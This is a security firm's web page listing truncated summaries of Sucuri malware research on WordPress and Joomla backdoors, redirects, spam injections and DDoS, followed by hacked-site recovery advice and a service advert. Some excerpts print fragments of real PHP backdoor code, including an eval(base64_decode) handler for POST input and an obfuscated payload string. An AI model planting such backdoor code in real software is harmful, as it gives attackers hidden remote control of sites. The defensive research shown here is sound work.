HomeLatest WordPress security threats
Latest WordPress security threats
This page brings together recent WordPress security research and attack reports from Wordfence, Patchstack, Sucuri and WPScan. We summarise the headlines and link to the original vendor research so you can read the source in full.
1,879 reports kept since 2009. Updated automatically every 10 minutes. Last checked 8 min ago.
- BaDoink Website Redirect - Malicious Redirections to Porn Websites on Mobile Devices
Research Sucuri, 26 May 2014
The past week has brought about a large number of cases where compromised websites had hidden redirections to porn injected into their code. All the infections had a similar pattern where they only targeted mobile devices. They are highl...
- Sucuri CloudProxy - Website Firewall Enhancements
Research Sucuri, 22 May 2014
When LA’s DA says that, “73% of our local businesses appear to have been hacked,” it begins to illustrate the importance website protection will play in the future of business, which is why we’ve placed so much emphasis on website protec...
- Watch a Layer 7 DDOS Attack - WordPress Security
Research Sucuri, 15 May 2014
A few weeks back we reported on very large Layer 7 DDOS attacks within the WordPress ecosystem. Today we decided to provide you a little illustration of what that looks like. Remember, there is a big difference between Brute Force and De...
- Does Sucuri Work With My Host? Yes, Yes We Do.
Research Sucuri, 7 May 2014
We’ve been scanning and removing malware from websites for years and in this time frame we have seen the website security domain grow by leaps and bounds. Over the same period, the ubiquity of the internet has reached to all corners of t...
- SiteCheck Extended - Making It Easier to Scan Your Websites
Research Sucuri, 2 May 2014
Sucuri SiteCheck is our free website malware scanner that crawls any website to detect signs of malware injections, SEO spam, blacklisting, defacement and other similar indicators of a compromised website. It is widely used by webmasters...
- AdSense Blackmail - Hacking Websites for Profit
Research Sucuri, 29 Apr 2014
We deal with different types of malware injections and compromises everyday and the most common question our clients ask us is, “Why me? Why my small little site?” There are so many answers to this question. In some cases, someone may at...
- PHP Callback Functions: Another Way to Hide Backdoors
Research Sucuri, 25 Apr 2014
We often find new techniques employed by malware authors. Some are very interesting, others are pretty funny, and then there are those that really stump us in their creativity and effectiveness. This post is about the latter. Everyone wh...
- Joomla Plugin Constructor Backdoor
Research Sucuri, 23 Apr 2014
We recently wrote about backdoors in pirated commercial WordPress plugins. This time it will be a short post about an interesting backdoor we found in a Joomla plugin. It was so well organized that at first we didn’t realize there was a ...
- Double hidden style - Hiding spam
Research Sucuri, 17 Apr 2014
We see many tricks that hackers use to make search engine bots think that the injected spam is not hidden. One of the common approaches is to place a spam block inside a div with some particular id or class and then add a JavaScript call...
- Critical Update for JetPack WordPress Plugin
Research Sucuri, 10 Apr 2014
The Jetpack team just released a critical security update to fix a security vulnerability in the Jetpack WordPress plugin. The vulnerability allows an attacker to bypass the website’s access control and publish posts on the site. All ver...
- Ad Violations: Why Search Engines Won’t Display Your Site If it’s Infected With Malware
Research Sucuri, 2 Apr 2014
As your website’s webmaster have you ever seen an e-mail from Google like this?: Hello, We wanted to alert you that one of your sites violates our advertising policies. Therefore, we won’t be able to run any of your ads that link to that...
- Unmasking “Free” Premium WordPress Plugins
Research Sucuri, 26 Mar 2014
WordPress has a large repository of free plugins (currently 30,000+) that can add almost any functionality to your blog. However, there is still a market for premium plugins. Premium plugins are especially popular when they help blogs ma...
- Understanding Denial of Service and Brute Force Attacks - WordPress, Joomla, Drupal, vBulletin
Research Sucuri, 12 Mar 2014
Many are likely getting emails with the following subject header: Large Distributed Brute Force WordPress Attack Underway - 40,000 Attacks Per Minute . Just this week we put out a post entitled: More Than 162,000 WordPress Sites Used for...
- More Than 162,000 WordPress Sites Used for Distributed Denial of Service Attack
Research Sucuri, 10 Mar 2014
Distributed Denial of Service (DDoS) attacks are becoming a common trend on our blog lately, and that’s okay because it’s a very serious issue for every website owner. Today I want to talk about a large DDoS attack that leveraged thousan...
- Highly Effective Joomla Backdoor with Small Profile
Research Sucuri, 27 Feb 2014
It feels like every day we’re finding gems, or what appear to be gems to us. We try to balance the use of the term, but I can’t lie - these are truly gems. The methods that attackers are implementing are, in some instances, ingenious. I ...
- SiteCheck Chrome Extension Now Available
Research Sucuri, 20 Feb 2014
Have you ever wondered if the websites you (or your family) visit contain code that is potentially harmful to you or your computer? If you are a Chrome user, then you’re in luck because we’ve made it much simpler for you to utilize SiteC...
- Malicious iFrame Injections Host Payload on Tumblr
Research Sucuri, 19 Feb 2014
It’s always fun to watch malware developers using different techniques to code their creations. Sometimes it’s a matter of obfuscation, placement, injection, but this time we will look at how they code it to be dynamic. I believe this is...
- PHP Backdoors: Hidden With Clever Use of Extract Function
Research Sucuri, 17 Feb 2014
When a site gets compromised, one thing we know for sure is that attackers love to leave malware that allows them access back into the site; this type of malware is called a backdoor. This type of malware was named this because it allows...
- Mysterious Zencart Redirects Leverage HTTP Headers
Research Sucuri, 16 Feb 2014
About a week ago we got an interesting Zencart case. Being that we don’t often write about Zencart we figured it’d be good time to share the case and details on what we found. The Scenario The site was redirecting to “ www .promgirl .de ...
- Joomla JomSocial Remote Code Execution Vulnerability
Research Sucuri, 10 Feb 2014
The JomSocial team just released an update that fixes a very serious remote code execution vulnerability that affects any JomSocial version older than 3.1.0.4. From their hot-fix update: Yesterday we released version 3.1.0.4 which fixes ...
- Darkleech + Bitly.com = Insightful Statistics
Research Sucuri, 7 Feb 2014
This post is about how hackers abuse popular web services and how this helps security researchers obtain interesting statistics about malware attacks. We, at Sucuri, work with infected websites every day. While we see some particular inf...
- Many Pieces of a Puzzle: Target, Neiman Marcus and Website Hacking
Research Sucuri, 5 Feb 2014
Corporations get hacked all the time. This is not news to anyone in the security business, but it has certainly received a lot of attention from those in the media over the last few weeks because of a couple of large-scale credit card ev...
- Website Mesh Networks Distributing Malware
Research Sucuri, 24 Jan 2014
Can you imagine having the keys to a kingdom? How awesome would that be!! This is true in all domains, especialy when it comes to your website. This is almost like the holy grail of website attacks, gain access and do what you want with ...
- Recent OptimizePress Vulnerability Being Mass Infected
Research Sucuri, 17 Jan 2014
A few weeks ago we wrote about a file upload vulnerability in the OptmizePress theme. We were seeing a few sites being compromised by it, but nothing major. That all changed yesterday when we detected roughly 2,000 websites compromised w...
- The Hidden Backdoors to the City of Cron
Research Sucuri, 16 Jan 2014
An attacker’s key to creating a profitable malware campaign is persistence. Malicious code that is easily detected and removed will not generate enough value for the attacker. This is the reason why we are seeing more and more malware us...
- Sucuri Company Meeting - Brazil 2014
Research Sucuri, 15 Jan 2014
2013 was a great year for Sucuri! We were able to add some great services and tools like CloudProxy to help website owners and administrators fight malware. We also grew the Sucuri team quite a bit in an effort to support our products, a...
- PHP str_replace to hide malware
Research Sucuri, 3 Jan 2014
We found another interesting piece of PHP-based malware on a client site a few days ago: $exg="JGMnd9J2NvdW50JzskYTnd0kX0ndNPndT0tJRTtpZihyZXNldCgkndYSk9PSdtandCcgJndiYgJGMondJGEpPjM"; $iyo="GxhndY2UndoYXJyYndXkoJy9bndXlndx3PVxzXS8nLndCc...
- WordPress OptimizePress Theme - File Upload Vulnerability
Research Sucuri, 12 Dec 2013
We’re a few days short on this, but it’s still worth releasing as the number of attacks against this vulnerability are increasing ten-fold. The folks at OSIRT were the first to report this in late November, 2013. In our cases we’re seein...
- How to eval() without eval() in PHP
Research Sucuri, 11 Dec 2013
According to our daily malware analysis experience, we’ve noticed that the bad guys are using obfuscation more and more to hide what they are doing. Take for example this piece of code we found injected on a website: $uhn = “IdsdMR8PY8e1...
- How We Decoded Some Nasty Multi-Level Encoded Malware
Research Sucuri, 9 Dec 2013
From time to time, we come up with interesting bits of malware that are just calling us to decode and learn more about them. This is one of those cases. Recently, I crossed pathes with this little gem: That snippet is encoded malicious c...
- Phishing Emails to Install Malicious WordPress Plugins
Research Sucuri, 4 Dec 2013
When all else fails, the bad guys can always rely on some basic social engineering tactics with a little hit of phishing!! Over the weekend, a few of our clients received a very suspicious email telling them to download a new version of ...
- Stealing Credit Cards - A WordPress and vBulletin Hack
Research Sucuri, 28 Nov 2013
What better way to celebrate Thanksgiving than to share an interesting case that involves two of the most popular CMS applications out there - vBulletin and WordPress. Here is a real case that we just worked on this week, involving an at...
- WordPress password stealer
Research Sucuri, 27 Nov 2013
Following Fio’s recent post on the Joomla password stealer, here’s another beautiful example of password stealer. This time from WordPress environment. It’s easy to understand, but what’s interesting - it looks like legitimate code so yo...
- Another Fake WordPress Plugin - And Yet Another SPAM Infection!
Research Sucuri, 23 Nov 2013
We clean hundreds and thousands of infected websites, a lot of the cleanups can be considered to be somewhat “routine”. If you follow our blog, you often hear us say we’ve seen “this” numerous times, we’ve cleaned “that” numerous times. ...
- The Story of Clip:rect - A Black Hat SEO Trick
Research Sucuri, 21 Nov 2013
We regularly write about Black Hat SEO hacks here. Such hacks help hackers monetize their access to compromised sites by incorporating them into massive schemes that try to manipulate search engine results for queries that potential clie...
- Understanding Google’s Blacklist - Cleaning Your Hacked Website and Removing From Blacklist
Research Sucuri, 20 Nov 2013
Today we found an interesting case where Google was blacklisting a client’s site but not sharing the reason why. The fact they were sharing very little info should not be new, but what we found as we dove a little deeper should be. The i...
- Case Study: Analyzing a WordPress Attack - Dissecting the webr00t cgi shell - Part I
Research Sucuri, 8 Nov 2013
November 1st started like any other day on the web. Billions of requests were being shot virtually between servers in safe and not so safe attempts to access information. After months of waiting, finally one of those not so safe request ...
- PHP://input Backdoor
Research Sucuri, 8 Nov 2013
Just came across this backdoor (decoded): @error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { eval ( base64_deco...
- Blackhat SEO and ASP Sites
Research Sucuri, 6 Nov 2013
It’s all too easy to scream and holler at PHP based websites and the various malware variants associate with the technology, but perhaps we’re a bit too biased. Here is a quick post on ASP variant. Thought we’d give you Microsoft types s...
- Joomla - Fancy SPAM Injections
Research Sucuri, 5 Nov 2013
Malware writers can be really ingenious when it comes to obfuscating their code. And let’s face it, in today’s anti-malware push, they have to; the slightest variation will often trigger warnings that will make it look suspicious in turn...
- Understanding Search Engine Warnings - Part I - Google - This Site May Be Hacked
Research Sucuri, 29 Oct 2013
If you have any questions about malware, blacklisting, or security in general, send them to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here. Question: I just found out that my site is being flagg...
- Backdoor Evasion Using Encrypted Content
Research Sucuri, 28 Oct 2013
A few weeks ago on the Sucuri Research Labs we mentioned a new type of malware injection that does not use base64_decode, and instead conceals itself as a variable and is built with a combination of “base_” + (32*2) + “_decode”. This is ...
- Cleaning Up Your WordPress Site with the Free Sucuri Plugin
Research Sucuri, 16 Oct 2013
Update 9/9/16 : We released a new guide to cleaning a hacked WordPress site with our plugin. If your site has been recently hacked and you are trying to clean it up yourself, we recommend that you use SiteCheck Malware Scanner , our Free...
- Sucuri CloudProxy WAF Plugin for WordPress
Research Sucuri, 10 Oct 2013
If you are using our CloudProxy WAF to protect your WordPress websites, we highly recommend that you also install our new CloudProxy plugin for WordPress. It has been public for a few weeks, and now we feel it is ready for production use...
- Do you still look for base64_decode?
Research Sucuri, 9 Oct 2013
A common keyword that people use to find hidden injections on web sites is base64_decode. Youoften see injections that look like eval ( base64_decode or eval ( gzinflate ( base64_decode beingused by the attackers. So most web security to...
- Avira, AVG and WhatsApp Defaced
Research Sucuri, 8 Oct 2013
If you visited the web sites for Avira, AVG or WhatsApp this morning, you probably saw that they didn’t look like they should. All of them were defaced and looked like this: It is a bit horrifying when you see such big sites, including s...
- Malware iFrame Campaign from Sytes(.)net
Research Sucuri, 4 Oct 2013
For the last few weeks we have been tracking a large malframe (malicious iframe) campaign that has been injecting iframes from random domains from sytes(.)net into compromised sites. Malicious iframe injection is nothing new, the bad guy...
- WordPress Database Table and wp_head Injections
Research Sucuri, 30 Sep 2013
There are multiple places where a malware injection can be hidden on a web site. On WordPress, for example, it can be hidden inside the core files, themes, plugins, .htaccess and on the database. More often than not, the malware uses a c...
- Sucuri Expands Research Efforts with Acquisition of Unmask Parasites
Research Sucuri, 20 Sep 2013
Our goal at Sucuri is to be the best website security company of today and in the future. To help build on our existing research efforts, and to expand our ability to scan websites and detect malware, we are very excited to announce the ...
- Ask Sucuri: Non-Alphanumeric Backdoors
Research Sucuri, 12 Sep 2013
If you have any questions about malware, blacklisting, or security in general, send them to contact@sucuri.net and we will write a post about it and share. For all the “Ask Sucuri” answers, go here. Question: My site got hacked and I am ...
Common types of WordPress compromise
WordPress compromises do not all look the same. Some are obvious to visitors, while others are designed to remain unnoticed. A site may start sending visitors to an unrelated domain, display pages or links that the owner never created, or contain a backdoor that allows an attacker to return after the visible problem has been removed.
Other compromises can involve rogue administrator accounts or fake plugins placed in the WordPress installation to blend in with legitimate software. On WooCommerce sites, malicious code may target the checkout process or other pages that handle customer data. The presence of unfamiliar code is not enough on its own to identify what happened, so the investigation needs to establish what changed, when it changed and how the attacker gained access.
Outdated components are one possible route, but compromised passwords, exposed hosting credentials and other weaknesses can also matter. WordPress recommends keeping software current, using strong passwords, controlling file permissions and maintaining reliable backups as part of normal hardening.
Signs your WordPress site may be hacked
Unexpected redirects are a common warning sign, particularly when they appear only on certain devices, browsers or traffic sources. Other clues include unfamiliar administrator users, pages you did not publish, altered titles or search snippets, unexplained file changes, new scheduled tasks, or security warnings in Google Search Console.
Performance problems can also justify investigation, but a slow site does not automatically mean malware. The same applies to unusual server load or email activity. Treat these as signals to inspect logs, files, users and recent changes rather than proof of a specific infection.
Google recommends using the Security Issues report in Search Console when hacked content or malware is suspected. A simple site search can also reveal indexed pages that do not belong to you. If you find something unexpected, record it before making changes so you have evidence to compare during cleanup.
What to do first if you think your WordPress site is hacked
Do not begin by deleting every suspicious file you can see. First take a copy of the affected site and database, note the time the problem was found and preserve relevant logs where available. This gives you something to examine if the visible symptoms return or if you need to identify the original entry point.
Change passwords for WordPress administrators, hosting, SFTP or FTP, the database and other privileged services that could have been exposed. Review all administrator accounts and remove access you do not recognise. Then decide whether the safest recovery route is a clean restoration from a known good backup or a controlled malware cleanup.
The job is not finished when the unwanted page or redirect disappears. Check themes, plugins, WordPress core, configuration files and scheduled tasks for persistence, update vulnerable components and close the route that allowed access. If Google has flagged the site, follow its hacked site guidance and request review only after the site has been cleaned. Our WordPress malware removal page explains the recovery service. Hacked Site Rescue is £249 fixed price.
Common questions
Answers to the questions we hear most about this.
How can I tell if my WordPress site has malware?
Look for unexpected redirects, unfamiliar administrator accounts, pages or links you did not create, unexplained file changes and security warnings in Google Search Console. None of these signs identifies the cause by itself, so the site still needs investigation.
Should I delete suspicious files straight away?
Not necessarily. Take a copy of the site and database first and preserve useful logs where possible. Deleting visible files before recording the incident can remove evidence without closing the route used to gain access.
Can restoring a backup fix a hacked WordPress site?
A clean backup can be an effective recovery route if it predates the compromise, but you still need to identify and fix the entry point. Otherwise the same weakness can remain after the restore.
What should I change after a WordPress hack?
Change privileged passwords, review administrator users, update vulnerable software and inspect the site for persistence such as backdoors or altered scheduled tasks. The exact steps depend on how the compromise occurred.
Think your website has been hacked?
Call us or send the details. Hacked Site Rescue is a fixed £249, and we find how the attacker got in.